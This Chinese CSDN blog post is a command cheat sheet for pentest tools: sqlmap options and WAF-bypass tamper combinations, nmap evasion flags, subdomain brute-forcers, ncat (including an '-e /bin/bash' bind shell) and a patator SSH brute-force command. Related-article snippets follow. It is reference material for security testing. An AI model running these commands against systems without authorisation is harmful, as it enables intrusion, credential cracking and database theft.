命令速查【sqlmap,nmap,sublist3r,subDomainsBrute,wydomain,ncat,patator】

最新推荐文章于 2023-09-22 16:42:49 发布
最新推荐文章于 2023-09-22 16:42:49 发布
阅读量1k 收藏 6
点赞数 1
文章标签: sqlmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wy_97/article/details/79118390
版权

sqlmap

-d                               //直接连接数据库
-u URL, --url=URL                //跟目标的url
-l                               //从Burp或者代理软件的日志文件中解析目标
-m                               //从文件中扫描多个目标 
-g                               //搜索中的结果作为目标地址 
--method=METHOD                  //使用所给的方法连接目标 
--data=DATA                      //填写要用post 提交的数据 
--headers=HEADERS                //添加更加复杂的头
--threads=THREADS                //大使用线程数
-p                               //可测试的变量
--tamper=TAMPER                  //用给出的脚本对注入数据进行混淆
--time-sec=TIMESEC               //设置延迟注入的时间
--union-char=UCHAR               //设定暴力破解列数的字段
--dns-domain=DNS                 //DNS溢出攻击所用域名
--hostname                       //检索DBMS服务器的主机 名称
--users,--passwords,--privileges //枚举DBMS用户,用户密码的哈希值,用户的权限
--dbs,--tables,--columns,--dump  //枚举DBMS数据库,DBMS数据库的表,DBMS数据库的字段,结果导出
--dump-all                       //下载所有的表
-D,-T,-C                         //使用哪个数据库,哪个表,哪个字段
--file-dest=DFILE                //使用绝对路径写入文件
--os-cmd=OSCMD                   //运行系统命 令行
--os-shell                       //运行shell
--os-smbrelay                    // 一键进行smb注入
--os-bof                         // 溢出攻击(SQL server)
--priv-esc                       //用户特权提升
--mobileImitate                  //模仿手机的HTTP头
--smart                          //智能判断注入
--identify-waf                   //对WAF之类的进行检测测试

apostrophemask.py        用UTF-8全角字符替换单引号字符
apostrophenullencode.py        用非法双字节unicode字符替换单引号字符
appendnullbyte.py        在payload末尾添加空字符编码
base64encode.py        对给定的payload全部字符使用Base64编码
between.py        分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”
bluecoat.py        在SQL语句之后用有效的随机空白符替换空格符,随后用“LIKE”替换等于号“=”
chardoubleencode.py        对给定的payload全部字符使用双重URL编码(不处理已经编码的字符)
charencode.py        对给定的payload全部字符使用URL编码(不处理已经编码的字符)
charunicodeencode.py        对给定的payload的非编码字符使用Unicode URL编码(不处理已经编码的字符)
concat2concatws.py        用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例
equaltolike.py        用“LIKE”运算符替换全部等于号“=”
greatest.py        用“GREATEST”函数替换大于号“>”
halfversionedmorekeywords.py        在每个关键字之前添加MySQL注释
ifnull2ifisnull.py        用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例
lowercase.py        用小写值替换每个关键字字符
modsecurityversioned.py        用注释包围完整的查询
modsecurityzeroversioned.py        用当中带有数字零的注释包围完整的查询
multiplespaces.py        在SQL关键字周围添加多个空格
nonrecursivereplacement.py        用representations替换预定义SQL关键字,适用于过滤器
overlongutf8.py        转换给定的payload当中的所有字符
percentage.py        在每个字符之前添加一个百分号
randomcase.py        随机转换每个关键字字符的大小写
randomcomments.py        向SQL关键字中插入随机注释
securesphere.py        添加经过特殊构造的字符串
sp_password.py        向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs
space2comment.py        用“/**/”替换空格符
space2dash.py        用破折号注释符“--”其次是一个随机字符串和一个换行符替换空格符
space2hash.py        用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2morehash.py        用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2mssqlblank.py        用一组有效的备选字符集当中的随机空白符替换空格符
space2mssqlhash.py        用磅注释符“#”其次是一个换行符替换空格符
space2mysqlblank.py        用一组有效的备选字符集当中的随机空白符替换空格符
space2mysqldash.py        用破折号注释符“--”其次是一个换行符替换空格符
space2plus.py        用加号“+”替换空格符
space2randomblank.py        用一组有效的备选字符集当中的随机空白符替换空格符
unionalltounion.py        用“UNION SELECT”替换“UNION ALL SELECT”
unmagicquotes.py        用一个多字节组合%bf%27和末尾通用注释一起替换空格符
varnish.py        添加一个HTTP头“X-originating-IP”来绕过WAF
versionedkeywords.py        用MySQL注释包围每个非函数关键字
versionedmorekeywords.py        用MySQL注释包围每个关键字
xforwardedfor.py        添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF


普通tamper搭配方式:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

数据库为MSSQL的搭配方式:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

数据库为MySql的搭配方式:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

nmap

//Nmap支持主机名,ip,网段的表示方式例如:blah.highon.coffee, namp.org/24, 192.168.0.1;10.0.0-25.1-254
-sL                     仅仅是显示,扫描的IP数目,不会进行任何扫描
-sn                     ping扫描,即主机发现
-Pn                     不检测主机存活
-PS/PA/PU/PY[portlist]  TCP SYN Ping/TCP ACK Ping/UDP Ping发现
-PE/PP/PM               使用ICMP echo, timestamp and netmask 请求包发现主机
-PO[prococol list]      使用IP协议包探测对方主机是否开启   
-n/-R                   不对IP进行域名反向解析/为所有的IP都进行域名的反响解析
-sS/sT/sA/sW/sM                 TCP SYN/TCP connect()/ACK/TCP窗口扫描/TCP Maimon扫描
-sU                             UDP扫描
-sN/sF/sX                       TCP NullFINand Xmas扫描
--scanflags                     自定义TCP包中的flags
-sI zombie host[:probeport]     Idlescan
-sY/sZ                          SCTP INIT/COOKIE-ECHO 扫描
-sO                             使用IP protocol 扫描确定目标机支持的协议类型
-b “FTP relay host”             使用FTP bounce scan
-p                      特定的端口 -p80,443 或者 -p1-65535
-p U:PORT               扫描udp的某个端口, -p U:53
-F                      快速扫描模式,比默认的扫描端口还少
-r                      不随机扫描端口,默认是随机扫描的
-f; --mtu value                 指定使用分片、指定数据包的MTU.
-D decoy1,decoy2,ME             使用诱饵隐蔽扫描
-S IP-ADDRESS                   源地址欺骗
-e interface                    使用指定的接口
-g/ --source-port PROTNUM       使用指定源端口  
--proxies url1,[url2],...       使用HTTP或者SOCKS4的代理 

--data-length NUM               填充随机数据让数据包长度达到NUM
--ip-options OPTIONS            使用指定的IP选项来发送数据包
--ttl VALUE                     设置IP time-to-live域
--spoof-mac ADDR/PREFIX/VEBDOR  MAC地址伪装
--badsum                        使用错误的checksum来发送数据包
-oN                     将标准输出直接写入指定的文件
-oX                     输出xml文件

--script=
auth: 负责处理鉴权证书(绕开鉴权)的脚本
broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务
brute: 提供暴力破解方式,针对常见的应用如http/snmp等
default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力
discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等
dos: 用于进行拒绝服务攻击
exploit: 利用已知的漏洞入侵系统
external: 利用第三方的数据库或资源,例如进行whois解析
fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽
malware: 探测目标机是否感染了病毒、开启了后门等信息
safe: 此类与intrusive相反,属于安全性脚本
version: 负责增强服务与版本扫描(Version Detection)功能的脚本
vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067

sublist3r

//pentestbox中

-d //接url
-b //使用 subbrute模块
-p //使用特定TCP端口
-v //实时显示
-t //线程数量
-O //输出到

subDomainsBrute

//进入文件目录下
python subDomainsBrute.py --full xxx.cn

-f         //添加字典
--full     //全体扫描
-t         //线程
-o         //输出文件

wydomain

//进入文件目录下
python dnsburte.py -d xxx.cn
-t       //线程数
-d       //接url
-f       //字典名称
-o       //最终结果的名字(就在当前目录下,result目录下各个接口结果)

ncat

#端口扫描#
$nc -z -v -n 172.31.100.7 21-25  //打印21到25 所有开放的端口的banner,默认是TCP,-u参数调整为udp
//-z连接成功后立即关闭连接, 不进行数据交换
//-v详细输出
//-n 不要使用DNS反向查询IP地址的域名
$ nc -v 172.31.100.7 21          //连接开放端口21并且打印运行在这个端口上服务的banner
#聊天#
//Server
$nc -l 1567                      //netcat 命令在1567端口启动了一个tcp 服务器,所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。
//Client
$nc 172.31.100.7 1567            //不管你在机器B上键入什么都会出现在机器A上。
#文件传输#
//Server
$nc -l 1567 > file.txt           //> 表示接受到file.txt
//Client
nc 172.31.100.23 1567 < file.txt //< 表示传输file.txt
#反弹shell#
$ ncat -l 10000 -e /bin/bash     //-e 标志将一个 bash 与端口 10000 相连
#端口转发#
$ ncat -u -l 80-c 'ncat -u -l 8080' //-c 连接到 80 端口的连接都会转发到 8080 端口

patator

  + ftp_login     : 暴力破解FTP
  +ssh_login     : 暴力破解 SSH
  +telnet_login  : 暴力破解 Telnet
  +smtp_login    : 暴力破解 SMTP
  +smtp_vrfy     : 使用SMTP VRFY进行枚举
  +smtp_rcpt     : 使用 SMTP RCPTTO枚举合法用户
  +finger_lookup : 使用Finger枚举合法用户
  +http_fuzz     : 暴力破解 HTTP
  +ajp_fuzz      : 暴力破解 AJP
  +pop_login     : 暴力破解 POP3
  +pop_passd     : 暴力破解 poppassd(http://netwinsite.com/poppassd/)
  +imap_login    : 暴力破解 IMAP4
  +ldap_login    : 暴力破解 LDAP
  +smb_login     : 暴力破解 SMB
  +smb_lookupsid : 暴力破解 SMB SID-lookup
  +rlogin_login  : 暴力破解 rlogin
  +vmauthd_login : 暴力破解 VMware Authentication Daemon
  +mssql_login   : 暴力破解 MSSQL
  +oracle_login  : 暴力破解 Oracle
  +mysql_login   : 暴力破解 MySQL
  +mysql_query   : 暴力破解 MySQLqueries
  +rdp_login     : 暴力破解 RDP(NLA)
  +pgsql_login   : 暴力破解PostgreSQL
  +vnc_login     : 暴力破解 VNC
  +dns_forward   : 正向DNS 查询
  +dns_reverse   : 反向 DNS 查询
  +snmp_login    : 暴力破解 SNMPv1/2/3
  +ike_enum      : 枚举 IKE 传输
  +unzip_pass    : 暴力破解 ZIP加密文件
  +keystore_pass : 暴力破解Java keystore files的密码
  +sqlcipher_pass : 暴力破解加密数据库SQL Cipher的密码-
  +umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
  +tcp_fuzz      : Fuzz TCP services
  +dummy_test    : 测试模块
//help查询
python patator.py ssh_login --help
//爆破ssh
python patator.py ssh_login host=xxx.xxx.xxx.xxx user=FILE1 1=/root/user.txt password=FILE0 0=/root/newpass.txt
Sp4rkW
关注
专栏目录
子域名收集常用工具(Layer、subDomainsBrutesublist3r、dnsenum)
墨痕诉清风的博客
02-21 6814
它不仅可以查询网站的主机地址信息、域名服务器和邮件交换记录,还可以在域名服务器上执行axfr请求,然后通过谷歌脚本得到扩展域名信息,提取子域名并查询,最后计算C类地址并执行whois查询,执行反向查询,把地址段写入文件。一个SSL/TLS证书通常包含域名、子域名和邮件地址,这些也经常成为攻击者非常希望获得的有用信息。例如:www.xxxxx.com主域不存在漏洞,并且防护措施严密,而二级域名 edu.xxxxx.com存在漏洞,并且防护措施松散,那么就可以采用迂回战术拿下子域名,然后逐步靠近主域。
【安全工具】subDomainsBrute 简单使用
Continuejww的博客
07-17 374
同理需要Python3.8+(Python3.5+,Python2.7都可以)的环境。5.用下面的指令就会成功(可能是名字在python中不叫dns)如果多次出现少文件(上面的错误),那就一直使用并安装下去。4.安装dns,发现不行,报下面的错误。2.扫描目标ip,出现这样的错误。1.进入文件夹的所在目录下。在这下面按下cmd指令。3.说明没有这个文件。
子域名爆破subDomainsBrute的简单使用
alohai的博客
05-17 2459
工具GIthub地址:https://github.com/lijiejie/subDomainsBrute 首先,使用git clone 下载到本地的目录 git clone https://github.com/lijiejie/subDomainsBrute python 根据版本下载依赖的包。 python3 pip install aiodns python2 pip install dnspython gevent cd 到 subDomainsBrute.py 的目录下 运行如下命令获得它的用
subDomainsBrute具体使用
weixin_50464560的博客
08-09 4307
工具名称:subDomainsBrute工具作者: lijiejieGithub地址:https://github.com/lijiejie/subDomainsBrute功能特点用小字典递归地发现三级域名,四级域名、五级域名等域名字典较为丰富,小字典就包括1万5千条,大字典多达6万3千条默认使用114DNS、百度DNS、阿里DNS这几个快速又可靠的Public DNS查询,可修改配置文件添加DNS服务器(在dict里面可以进行添加)自动去重泛解析的域名,当前规则: 超过2个域名指向同一IP,则此后发现的其
子域名枚举软件,Sublist3r(使用指南)(附带shell脚本自动化批量处理URL)(解放双手必看)(记录自己成长)
weixin_51203422的博客
10-25 941
Sublist3r 介绍:Sublist3r 是一个使用 OSINT 枚举网站子域的 Python 工具,它可以帮助渗透测试人员收集其目标域的子域,扫出来的还是挺多的,用whatweb筛选一下这个工具其实挺不错,专业,专业,还是专业,子域名枚举这一块,因为扫出来的子域名非常多,所以whatweb处理这一块时间会比较久,不要怀疑,不是卡了,脚本绝对比你手工快的不止十倍。 参数 -o 将结果保存为文本文件 -d 要枚举的子域的域名 -p 指定端口扫描 -v 启用详细模式并实施显示效果 -t 调整线数程 代码中
网络逻辑漏洞、SQLMAPNmap、burpsuite及其命令的使用方法
weixin_65695770的博客
04-07 4215
SQLMAP sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 sqlmap支持五种不同的注入模
SQLMAP常用命令速查
浪子燕青的博客
02-23 3535
title: SQLMAP速查表 copyright: true top: 0 date: 2019-05-20 14:28:16 tags: 渗透测试 categories: 渗透测试 permalink: password: keywords: description: SQLMAP 相关资料,持续更新。 罪人们总是不在意为了邪恶的欲望把痛苦加在别人的身上,却在自己面临刑罚的时候恐惧和哀求。 使用经验总结 在一旦注入成功且获得精确信息通过以下详细参数来指定检索、枚举动作和动作执行对象:检索DBMS的.
MAC M1 使用命令安装brew、nmapsqlmap
weixin_41949487的博客
02-23 2981
安装Homebrew 初次使用MacBook,正在研究中。 今天为了安装sqlmapnmap,了解到在mac中使用brew安装更为便捷,网上大量的brew安装方法都试了一遍,但安装中都出现了不同的问题,耗费了几个小时,下班后在家静下心,一步一步看网上的过程和命令的含义,最终解决了这个问题,故此有了这篇文章,以记录成功安装的方法。 Homebrew是什么? homebrew是一款mac os平台下的软件包管理工具,拥有安装、卸载、更新、查看、搜索等很多实用的功能。使用简单的指令就能实现包管理,不用关心各种依
sqlmap命令大全
02-22
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令
抓包,nmapsqlmap
Zsl1183323的博客
03-22 4442
抓包方式: 1.进入kali,打开terminal emulator,输入burpsuite,回车 2.在弹出的jre对话框中勾选此jre不再显示,再点击OK,在对话框点击I Accept,在新对话框点击下一步 3.点击 浏览器,搜索172.0.0.1:8080,下载证书,再打开设置,选择settings,拉倒最底层单击settings,选择第四个单选框,在http proxy中输入172.0.0.1,在在porp中输入8080,单击OK 4.选择Privacy&Security,拉到最下方,双击V
猪猪侠目标子域名信息收集wydomain-master
11-04
猪猪侠的目标子域名信息收集神器wydomain-master,白帽子必备
web渗透测试----5、暴力破解漏洞--(3)FTP密码破解
七天
06-23 1723
FTP暴力破解
hydra、ncrack、patator、medusa工具之ssh爆破
weixin_46561783的博客
09-22 316
hydrancrackpatatormedusa。
三分钟学会渗透测试——信息收集
sGanYu
08-14 3962
什么是信息收集 信息收集主要是收集服务器的配置信息和网站的敏感信息,主要包括域名信息、子域名信息、目标网站信息、目标网站真实IP、目录文件、开放端口和服务、中间件信息等等。在进行渗透测试之前,第一步也是非常关键的一步就是对目标进行信息收集,我们尽可能收集关于目标的信息,这将会大大提高发现漏洞的概率。 信息收集大致分类 第一类:主动信息收集。通过直接访问、扫描网站 第二类:被动信息收集。利用第三方的服务对目标进行访问了解,比例:谷歌搜索、Shodan搜索等等 Whois 在进行网站注册的时
Linux nc,netcat端口扫描
码农崛起
09-21 1248
用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具。2. 端口的扫描,nc可以作为client发起TCP连接。端口的侦听,nc可以作为server以TCP或。指定发送数据的源IP地址,适用于多网卡机。指定nc使用UDP协议,默认为TCP。表示zero,表示扫描时不发送任何数据。3. 机器之间传输文件。4. 机器之间网络测速。
subDomainsBrute安装
aurora__的博客
07-14 7693
subDomainsBrute特点 用小字典递归地发现三级域名,四级域名、五级域名等不容易被探测到的域名 字典较为全面,小字典就包括3万多条,大字典多达8万条 默认使用114DNS、百度DNS、阿里DNS这几个快速又可靠的公共DNS进行查询,可随时修改配置文件添加你认为可靠的DNS服务器 自动筛选泛解析的域名,当前规则是: 超过10个域名指向同一IP,则此后发现的其他指向该IP的域名将被丢
信息收集之子域名查询--子域名扫描器: 子域名挖掘机 Subdomainsbrute---基本使用
qq_51550750的博客
02-17 3722
信息收集之子域名查询–子域名扫描器: 子域名挖掘机 Subdomainbrute—基本使用 工具介绍:subDomainsBrute 工具作者: lijiejie Github地址:https://github.com/lijiejie/subDomainsBrute 功能特点 用小字典递归地发现三级域名,四级域名、五级域名等域名 字典较为丰富,小字典就包括1万5千条,大字典多达6万3千条 默认使用114DNS、百度DNS、阿里DNS这几个快速又可靠的Public DNS查询,可修改配置文件添加DNS服务器
subDomainsBrute 安装 子域名查询
mixboot
06-27 1999
1,subDomainsBrute安装 git clone https://github.com/lijiejie/subDomainsBrute.git sudo pip install dnspython gevent ╰─➤ cd subDomainsBrute ╰─➤ python subDomainsBrute.py ╰─➤ python subDomainsBrute.py ...
nmap --script nmap-vulners -sV 命令、怎么使用
最新发布
02-23
nmap是一个常用的网络扫描和安全评估工具,而nmap-vulners是nmap的一个脚本,用于检测目标主机上的漏洞。下面是对nmap --script nmap-vulners -sV命令的介绍和使用方法: 1. nmapnmap是一个开源的网络探测和安全评估工具,用于扫描目标主机上的开放端口、服务版本等信息。 2. --script nmap-vulners:这个参数指定了要使用的脚本,即nmap-vulners。nmap-vulners是一个nmap的脚本,它使用漏洞数据库vulners来检测目标主机上的已知漏洞。 3. -sV:这个参数指定了要进行版本探测。通过版本探测,nmap可以尝试识别目标主机上运行的具体服务及其版本号。 使用方法: 要使用nmap --script nmap-vulners -sV命令,你需要在命令行中输入以下内容: ``` nmap --script nmap-vulners -sV <目标主机> ``` 其中,<目标主机>是你要扫描的目标主机的IP地址或域名。 注意:在使用nmap进行漏洞扫描时,请确保你已经获得了合法的授权,并且遵守法律和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值